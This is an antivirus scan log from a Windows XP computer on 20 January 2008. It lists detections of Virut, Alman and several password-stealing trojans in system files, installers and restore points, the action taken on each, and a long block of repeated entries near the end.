1/20/2008 5:31:55 PM Real-time file system protection file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:28:21 PM Real-time file system protection file C:\WINDOWS\explorer.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\system32\drwtsn32.exe.
1/20/2008 5:22:08 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\SETUP_CK.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:08 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\SETUPEX.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:06 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\INPAGE.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CRYPSERV.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CKRFRESH.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CKCONFIG.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:04 PM Real-time file system protection file D:\SOFTWARE\SONY\START.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:50 PM Real-time file system protection file D:\SOFTWARE\SONY\INSTALL\DIRECTX9\DXSETUP.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:50 PM Real-time file system protection file D:\SOFTWARE\SONY\INSTALL\DASHBOARD\MSISETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:46 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DSS-25\FTDIUNIN.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:45 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DSS-20\FTDIUNIN.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:44 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DCU-11\UNINSTALLDRIVER.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:44 PM Real-time file system protection file D:\SOFTWARE\SONY\CDBROWSER\PHONE.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:42 PM Real-time file system protection file D:\SOFTWARE\SONY\CDBROWSER\BIN\DEMO32.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:32 PM Real-time file system protection file D:\SOFTWARE\SONY\APPLICATIONS\PSA\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:30 PM Real-time file system protection file D:\SOFTWARE\SONY\APPLICATIONS\D2P\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:20:20 PM Real-time file system protection file D:\SOFTWARE\POWERDVD\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:56 PM Real-time file system protection file D:\SOFTWARE\OXFORD\QUICKFIND\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:42 PM Real-time file system protection file D:\SOFTWARE\NOKIA\SOFTWARE\LIFEBLOG\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:39 PM Real-time file system protection file D:\SOFTWARE\NOKIA\SOFTWARE\LIFEBLOG\DIRECTX9\DXSETUP.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:18:00 PM Real-time file system protection file D:\SOFTWARE\NERO\SETUPX.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:59 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:59 PM Real-time file system protection file D:\SOFTWARE\NERO\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:50 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\NEROVISION\W9X\NEROVISION.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:49 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\NEROVISION\W2K\NEROVISION.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:37 PM Real-time file system protection file D:\SOFTWARE\NERO\NERO MEDIA PLAYER\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:06:18 PM Real-time file system protection file D:\EXTRAS\SOMETHING\LOVEX.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:05:54 PM Real-time file system protection file D:\CIES INTERNET\ANTI-VíRUS AVG 7.0 + SERIAL\AVG70F_148.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:04:51 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{44EE1785-CF13-4E08-82F5-B87CAD9CA49B}\RP130\A0242074.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524427.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524401.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524400.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:04 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524392.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:04 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524398.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:02 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510607.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:02 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510608.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:00 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510603.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:00:26 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{44EE1785-CF13-4E08-82F5-B87CAD9CA49B}\RP130\A0242078.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:39 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524445.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:39 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524446.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:37 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP119\A0510708.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:35 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP108\A0470803.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:52:45 PM Real-time file system protection file C:\WINDOWS\LINKINFO.dll Win32/Alman.NAD virus deleted (after the next restart) - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Internet Explorer\iexplore.exe.
1/20/2008 4:45:30 PM Real-time file system protection file C:\WINDOWS\LINKINFO.DLL Win32/Alman.NAD virus deleted (after the next restart) - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:44:52 PM Real-time file system protection file C:\Program Files\Internet Explorer\iexplore.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:55 PM Startup scanner file C:\WINDOWS\system32\msiexec.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:54 PM Startup scanner file C:\WINDOWS\system32\ctfmon.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:54 PM Startup scanner file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:53 PM Startup scanner file C:\Program Files\Common Files\Real\Update_OB\realsched.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:53 PM Startup scanner file C:\WINDOWS\system32\cqmjp.exe probably a variant of Win32/TrojanProxy.Ranky trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:52 PM Startup scanner file C:\Program Files\QuickTime\qttask.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:51 PM Startup scanner file C:\Program Files\Winamp\winampa.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:51 PM Startup scanner file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\Program Files\Common Files\InterVideo\SchSvr\SchSvr.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\WINDOWS\SOUNDMAN.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\system32\hkcmd.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\system32\igfxtray.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\49400WO.DLL a variant of Win32/PSW.WOW.SV trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:48 PM Startup scanner file C:\WINDOWS\49400MM.DLL a variant of Win32/PSW.Legendmir.NFF trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:46 PM Startup scanner file C:\WINDOWS\49400WL.DLL Win32/PSW.Legendmir.NFN trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:45 PM Startup scanner file C:\WINDOWS\Explorer.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:44 PM Real-time file system protection file C:\WINDOWS\system32\taskmgr.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: \??\C:\WINDOWS\system32\winlogon.exe.
1/20/2008 4:41:41 PM Startup scanner file C:\WINDOWS\explorer.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\userinit.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\logon.scr Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\ctfmon.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:38 PM Startup scanner file C:\WINDOWS\system32\logonui.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\WINDOWS\system32\rundll32.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\Program Files\Common Files\Real\Update_OB\realsched.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\WINDOWS\49400W.exe probably a variant of Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:35 PM Startup scanner file C:\WINDOWS\49400L.exe Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:33 PM Startup scanner file C:\WINDOWS\49400M.exe probably a variant of Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:31 PM Startup scanner file C:\WINDOWS\system32\vgbxiqre.exe probably a variant of Win32/TrojanProxy.Ranky trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:30 PM Startup scanner file C:\Program Files\QuickTime\qttask.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:29 PM Startup scanner file C:\Program Files\Winamp\winampa.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:29 PM Startup scanner file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:28 PM Startup scanner file C:\WINDOWS\system32\iexplore.exe a variant of Win32/Poebot trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\Program Files\Common Files\InterVideo\SchSvr\SchSvr.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\WINDOWS\ALCMTR.EXE Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:24 PM Startup scanner file C:\WINDOWS\SOUNDMAN.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:24 PM Startup scanner file C:\WINDOWS\system32\Hdaudpropshortcut.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:23 PM Startup scanner file C:\WINDOWS\system32\hkcmd.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:22 PM Startup scanner file C:\WINDOWS\system32\igfxtray.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:13 PM Real-time file system protection file C:\Program Files\Common Files\Real\Update_OB\r1puninst.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:13 PM Real-time file system protection file C:\Program Files\Real\RealPlayer\realplay.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:12 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:12 PM Real-time file system protection file C:\WINDOWS\EXPLORER.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:11 PM Real-time file system protection file C:\WINDOWS\system32\verclsid.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:11 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 5:32:55 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 5:32:27 PM Real-time file system protection file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:31:55 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 5:31:55 PM Real-time file system protection file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:28:21 PM Real-time file system protection file C:\WINDOWS\explorer.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\system32\drwtsn32.exe.
1/20/2008 5:22:08 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\SETUP_CK.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:08 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\SETUPEX.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:06 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\INPAGE.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CRYPSERV.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CKRFRESH.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CKCONFIG.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:04 PM Real-time file system protection file D:\SOFTWARE\SONY\START.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:50 PM Real-time file system protection file D:\SOFTWARE\SONY\INSTALL\DIRECTX9\DXSETUP.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:50 PM Real-time file system protection file D:\SOFTWARE\SONY\INSTALL\DASHBOARD\MSISETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:46 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DSS-25\FTDIUNIN.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:45 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DSS-20\FTDIUNIN.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:44 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DCU-11\UNINSTALLDRIVER.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:44 PM Real-time file system protection file D:\SOFTWARE\SONY\CDBROWSER\PHONE.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:42 PM Real-time file system protection file D:\SOFTWARE\SONY\CDBROWSER\BIN\DEMO32.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:32 PM Real-time file system protection file D:\SOFTWARE\SONY\APPLICATIONS\PSA\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:30 PM Real-time file system protection file D:\SOFTWARE\SONY\APPLICATIONS\D2P\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:20:20 PM Real-time file system protection file D:\SOFTWARE\POWERDVD\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:56 PM Real-time file system protection file D:\SOFTWARE\OXFORD\QUICKFIND\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:42 PM Real-time file system protection file D:\SOFTWARE\NOKIA\SOFTWARE\LIFEBLOG\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:39 PM Real-time file system protection file D:\SOFTWARE\NOKIA\SOFTWARE\LIFEBLOG\DIRECTX9\DXSETUP.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:18:00 PM Real-time file system protection file D:\SOFTWARE\NERO\SETUPX.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:59 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:59 PM Real-time file system protection file D:\SOFTWARE\NERO\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:50 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\NEROVISION\W9X\NEROVISION.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:49 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\NEROVISION\W2K\NEROVISION.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:37 PM Real-time file system protection file D:\SOFTWARE\NERO\NERO MEDIA PLAYER\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
